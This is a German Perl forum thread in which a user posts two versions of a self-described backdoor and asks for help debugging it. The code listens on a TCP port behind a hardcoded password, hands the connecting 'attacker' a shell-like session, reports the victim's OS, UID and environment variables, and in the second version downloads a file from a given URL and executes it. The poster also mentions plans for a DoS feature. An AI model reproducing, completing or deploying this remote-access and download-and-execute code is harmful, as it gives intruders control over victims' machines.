Sieht äußerst interessant aus. Mal sehen ob sicvh das einbauen läst. Habs momentan durch Split+RegEx gelöst. Kannste ja mal angucken.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
use strict;
use warnings;
use IO::Socket;
my $passwd='Test123';
$SIG{INT} = sub { print("Killed!"); exit(); };
$SIG{CHLD} = 'IGNORE';
our $skull = qq(_________
______
____
__
_
_
___
____
_____
____
________HAPPY
____________HACKING!
____
_____
______
_________
);
my $socket = new IO::Socket::INET(
LocalHost => "localhost",
LocalPort => 9999,
Proto => 'tcp',
Listen => SOMAXCONN,
Reuse => 1
) || die("Kann den Socket nicht initiallisieren! $!");
while(1){
my $new_socket = $socket->accept();
print "Angreifer hat sich verbunden!\n";
terminal($new_socket) if(fork()==0);
close($new_socket);
}
close($socket);
exit();
sub terminal
{
my $socket=shift;
my $pass_cnt = 10;
while($pass_cnt)
{
print $socket "Password:\n";
my $line=<$socket>;
if($line=~/^\s*$passwd\s*$/s)
{
$pass_cnt=1;
last();
}
}
unless($pass_cnt)
{
print $socket "PASSWORD WRONG!\n";
exit();
}
print "Angreifer hat sich eingeloggt!\n";
open(my $out, ">&STDOUT") or exit();
close(STDOUT) or exit();
close(STDERR) or exit();
close(STDIN) or exit();
*STDOUT=\*$socket;
*STDERR=\*$socket;
*STDIN=\*$socket;
print "Login OK\n";
print $skull;
my $buffer='';
while(my $line=<$socket>)
{
$line=~y/\x0D//d;
$line=~s/\x0A+$//s;
my @funcarr;
if($line =~ /^exit/){
print "Schließe Verbindung...\n";
close($socket);
last();
}
elsif($line =~ /^get/){
if($line =~ /^get$/){
print "get braucht einen parameter\n";
}
else{
@funcarr = split(/ /, $line);
print &get($funcarr[1]);
}
}
elsif($line =~ /^env$/){
foreach (keys(%ENV)) {
print "Key: $_ , Wert: $ENV{$_}\n";
}
}
print $out "Angreifer hat die Verbindung beendet!\n";
}
}
exit;
sub get() {
my $opt = shift;
if($opt =~ /^pid$/){
return "Die Backdoor läuft mit der PID $$\n";
}
elsif($opt =~ /^os$/){
return "Das Opfer hat das Betriebssystem '$^O'\n";
}
elsif($opt =~ /^uid$/){
return "Der Nutzer hat die UID $<\n";
}
else {
return "Parameter ist ungültig\n";
}
}
sub download(){
my $url = shift;
}
Ist aber noch nicht fertig. Bin noch dabei eine download &execute funktion einzubauen. Und mal sehen ob ichs noch hin bekomme mein DoS Script und mein PortScanner zu kombinieren um nen inteligenten DoS einzubauen. Nunja, man wird sehen was draus wird.
Im übrigen möchte ich mich nochmal bei euch allen für die nette Hilfe bedanken, was wäre ich blos ohne euch (Und die manpages und perldoc)
Edit: Habe nun folgenden neueren Code.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
use strict;
use warnings;
use IO::Socket;
use LWP;
use LWP::UserAgent;
my $passwd='Test123';
$SIG{INT} = sub { print("Killed!"); exit(); };
$SIG{CHLD} = 'IGNORE';
our $skull = qq(_________
______
____
__
_
_
___
____
_____
____
________HAPPY
____________HACKING!
____
_____
______
_________
);
my $socket = new IO::Socket::INET(
LocalHost => "localhost",
LocalPort => 9999,
Proto => 'tcp',
Listen => SOMAXCONN,
Reuse => 1
) || die("Kann den Socket nicht initiallisieren! $!");
while(1){
my $new_socket = $socket->accept();
print "Angreifer hat sich verbunden!\n";
terminal($new_socket) if(fork()==0);
close($new_socket);
}
close($socket);
exit();
sub terminal
{
my $socket=shift;
my $pass_cnt = 10;
while($pass_cnt)
{
print $socket "Password:\n";
my $line=<$socket>;
if($line=~/^\s*$passwd\s*$/s)
{
$pass_cnt=1;
last();
}
}
unless($pass_cnt)
{
print $socket "PASSWORD WRONG!\n";
exit();
}
print "Angreifer hat sich eingeloggt!\n";
open(my $out, ">&STDOUT") or exit();
close(STDOUT) or exit();
close(STDERR) or exit();
close(STDIN) or exit();
*STDOUT=\*$socket;
*STDERR=\*$socket;
*STDIN=\*$socket;
print "Login OK\n";
print $skull;
my $buffer='';
while(my $line=<$socket>)
{
$line=~y/\x0D//d;
$line=~s/\x0A+$//s;
my @funcarr;
if($line =~ /^exit/){
print "Schließe Verbindung...\n";
close($socket);
last();
}
elsif($line =~ /^get/){
if($line =~ /^get$/){
print "get braucht einen parameter\n";
}
else{
@funcarr = split(/ /, $line);
print &get($funcarr[1]);
@funcarr = ();
}
}
elsif($line =~ /^env$/){
foreach (keys(%ENV)) {
print "Key: $_ , Wert: $ENV{$_}\n";
}
}
elsif($line =~ /^downaexe/){
my $param = split(/ /, $line);
my $cont = &wget($param);
my $Url = $param;
my $Stop = index($Url,":");
my $Protokoll = substr($Url,0,$Stop);
my $Start = index($Url,"//") + 2;
my $Domain = substr($Url,$Start);
$Stop = index($Domain,"/");
$Domain = substr($Domain,0,$Stop);
$Start = rindex($Url,"/") + 1;
my $Dateiname = substr($Url,$Start);
open(my $fh, ">$Dateiname");
print $fh $cont;
close($fh);
print `./$Dateiname` or `start ./$Dateiname`;
}
print $out "Angreifer hat die Verbindung beendet!\n";
}
}
sub get() {
my $opt = shift;
if($opt =~ /^pid$/){
return "Die Backdoor läuft mit der PID $$\n";
}
elsif($opt =~ /^os$/){
return "Das Opfer hat das Betriebssystem '$^O'\n";
}
elsif($opt =~ /^uid$/){
return "Der Nutzer hat die UID $<\n";
}
else {
return "Parameter ist ungültig\n";
}
}
sub wget(){
my $url = shift;
my $agent = LWP::UserAgent->new();
my $ret;
my $resp;
$agent->agent("PerlBackdoor/1.1 Beta");
$resp = $agent->get($url);
$ret = $resp->decoded_content();
return $ret;
}
exit;
Jetzt wird wenn ich
http://127.0.0.1/test.sh downloaden möchte eine Dtaei mit den namen 2 Angelegt mit dme Inhalt "400 URL must be absolute"
Erkennt jemand von euch den Fehler?
EDIT2:
Lag daran das ich statt nen Array nen Skalar beim split genommen habe *kopf-meets-tischplatte* Und vergessen chmod zu setzten.- Muss ich das auf windoof auch machen? oder kann ich da ne runtergeladene datei einfach starten?.
Last edited: 2011-11-09 20:56:11 +0100 (CET)
Jemand zu Hause?![[twitter]](/battie/theme/default/icons/twitter.gif){kind=icon}
+17 replies![[default_avatar]](/battie/theme/default/default_avatar.gif){kind=avatar}
![[Homepage]](/battie/theme/default/homepage.gif)
JavaScript::SpiderMonkey. Das wäre elegant und sicher nicht aufwändig.
Schrift
Blog
Einstellungen![[feed]](/battie/theme/default/icons/feed.png){kind=icon}
Tags:
![[Powered by Battie]](/battie/img/powered.png)
